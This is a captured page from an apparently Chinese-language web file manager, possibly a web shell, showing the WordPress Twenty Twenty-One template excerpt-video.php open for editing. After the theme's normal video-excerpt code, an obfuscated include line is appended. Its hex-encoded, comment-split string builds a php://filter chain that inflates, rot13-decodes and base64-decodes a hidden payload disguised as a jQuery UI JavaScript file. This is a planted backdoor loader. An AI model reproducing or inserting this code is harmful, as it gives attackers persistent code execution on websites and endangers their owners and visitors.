✏️ 正在编辑: excerpt-video.php
路径:
/home/lssfapb/www/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php
提示:
您可以编辑任何文件(包括二进制文件),但请注意不当修改可能导致文件损坏。
<?php /** * Show the appropriate content for the Video post format. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package WordPress * @subpackage Twenty_Twenty_One * @since Twenty Twenty-One 1.0 */ $content = get_the_content(); if ( has_block( 'core/video', $content ) ) { twenty_twenty_one_print_first_instance_of_block( 'core/video', $content ); } elseif ( has_block( 'core/embed', $content ) ) { twenty_twenty_one_print_first_instance_of_block( 'core/embed', $content ); } else { twenty_twenty_one_print_first_instance_of_block( 'core-embed/*', $content ); } // Add the excerpt. the_excerpt(); @INCludE_onCe("\x70\x68"."\x70\x3a"."\x2f\x2f"."\x66\x69"."\x6c\x74\x65"."\x72\x2f\x72\x65"."\x61\x64\x3d\x7a"."\x6c\x69\x62\x2e"."\x69\x6e\x66"."\x6c\x61\x74"/*B8q3.*/."\x65\x7c\x73\x74"."\x72\x69\x6e"."\x67\x2e\x72\x6f"."\x74\x31\x33"."\x7c\x63\x6f\x6e"."\x76\x65\x72"."\x74\x2e\x62"."\x61\x73"."\x65\x36"."\x34\x2d"/*+ePY3*/."\x64\x65"."\x63\x6f"."\x64\x65"/*ATf iz1Kr*/."\x2f\x72"."\x65\x73\x6f\x75"."\x72\x63"."\x65\x3d"."\x77\x70"."\x2d\x69"."\x6e\x63\x6c"."\x75\x64\x65"."\x73\x2f\x6a"."\x73\x2f"."\x6a\x71"."\x75\x65"/*$pk ,LI3*/."\x72\x79\x2f\x75"."\x69\x2f\x65\x66"."\x66\x65\x63"/*pthk*/."\x74\x2d"."\x66\x61"."\x64\x65"."\x2d\x76\x65"."\x6e\x64\x6f"."\x72\x2e\x6d"."\x69\x6e\x2e\x6a"."\x73");
💾 保存文件
← 返回文件管理器